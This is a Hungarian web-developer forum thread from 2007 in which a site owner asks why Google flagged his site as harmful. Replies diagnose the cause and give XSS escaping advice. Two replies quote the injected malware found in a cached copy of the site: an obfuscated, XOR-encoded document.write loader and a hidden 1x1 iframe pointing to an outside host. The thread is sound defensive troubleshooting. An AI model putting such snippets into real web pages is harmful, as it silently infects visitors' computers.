ugrás a tartalomhoz

A google szerint : Az oldal káros lehet a számítógéped számára.

newlamer · 2007. Már. 17. (Szo), 18.24
Sziasztok!

A google aggasztónak találta az oldalamat. Néztem a stopbadware.org-ot, de sehol nem találok egy scanner oldalt, ami megmondja, hogy melyik link, script vagy akármi az, ami miatt feketelistára kerültem.
Tudnátok tanácsot adni? A kódot már átnéztem, nincs benne semmi BAD, a linkek közül lehet valamelyik gyanus, de melyik? Van olyan hely, ahol tesztelni tudom az oldalamat, és megmondja, mi a KONKRÉT probléma vele?
 
1

Hogy miért minősítette badware-nek?

s_volenszki · 2007. Már. 17. (Szo), 18.46
Szia!

Kellene még infó! Pl. egy url ahol meg lehet nézni az ominózus weboldalt! Mellesleg elég, ha egy link badware-re mutat az oldaladról, és már téged is minősíthet!

Itt vannak magyarázatok

s_volenszki
2

oldal

newlamer · 2007. Már. 18. (V), 04.03
Köszi a magyarázatot, olvasom. az oldal a leviter.hu, nem tudok rájönni, melyik link mutathat badware oldalra...
3

...lépésről lépésre...

s_volenszki · 2007. Már. 18. (V), 11.11
Szia!

Az első amit tennék, az az, hogy az itt leírtak alapján about-meta-tag-verification kizárólag az index oldalra tenném a google azonosítóját.

Ha te kódoltad a rendszert próbáld meg a $_GET[com]-nak más nevet adni. pl.:$_GET[page]. Különösebb indokom nincs rá (pláne nem a gugli szemszögéből), de amíg nekem $_GET[open] volt, addíg a látogatóim 90%-a csak feszegette a szervert! Továbbá ha jól gondolom adatbázis alapú az oldal, ha igen akkor kalapáld ki az összes, nem önmagába mutató linkeket, és nézd át az előző hozzászólásomban megadott címen található badware link gyüjteményben benne van-e egyik-másik.

Meg ha megy az angol akkor itt írnak még érdekes dolgokat: googlewebmastercentral

Jó munkát!

s_volenszki
4

A miért

attlad · 2007. Már. 18. (V), 11.17
Nézd meg az oldalad cache-elt verziójának a forráskódját, ott van benne ez:
<script language="JavaScript">e = '0x00' + '46';str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE%A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE%A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8%E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA%F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%FB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

Az oldal jelenlegi verziójában nincs benne a kód, így gondolom miután Google újra arra jár már nem fogja badware-nek jelölni, a kérdés csak az lehet hogy kerülhetett bele és ki szedte ki.

Kapcsolódó levlista szál:
http://weblabor.hu/levlistak/wl-flamelista/2007/03/008341
5

Köszönet!

newlamer · 2007. Már. 18. (V), 15.26
Nagyon köszönöm mindkettőtök segítségét! Vajon ki rakhatta be a scriptet? Mindegy, jó, hogy megvan a megoldás, és az információkat is köszönöm! A com-paramétert átnevezem, tényleg csábító a buherálásra, bár elég szoros az ellenőrzés a bejövő GET paraméterekre...
6

érdekes kód...

sotetbarna · 2007. Már. 18. (V), 20.41
érdemes lenne kideríteni, hogy HOGYAN tették bele ezt a kódot:

<div style="visibility:hidden"><iframe src="http://hhhg1.com/ment/" width=1 height=1></iframe></div>
guglizva úgy néz ki, máshol is volt ilyen próbálkozás
7

input ellenőrzés vs escapelés megjelenítéskor

Hodicska Gergely · 2007. Már. 18. (V), 21.03
bár elég szoros az ellenőrzés a bejövő GET paraméterekre
Az input ellenőrzése az sok szempontból fontos, de az XSS támadhatóság kivédése (jelen eseten valszeg ez áll fent Nálad) szempontjából ez nem annyira lényeges, fontosabb, hogy megjelenítéskor minden megbízhatatlan, kliens felől érkező adatot escapelve jeleníts meg: echo htmlspecialchars($_GET['input'], ENT_QUOTE);.


Üdv,
Felhő
8

Nem biztos hogy Te vagy a hibás

janoszen · 2008. Feb. 20. (Sze), 08.26
Nem biztos hogy Te vagy a hibás. Lehetséges, hogy a szolgáltatód rosszul konfigurálta be a PHP-jét és ennek következtében más, ott lakó oldalakon keresztül mászott be a féreg. Nekem is volt ilyenem; ezután döntöttem úgy, hogy saját szerverre váltok.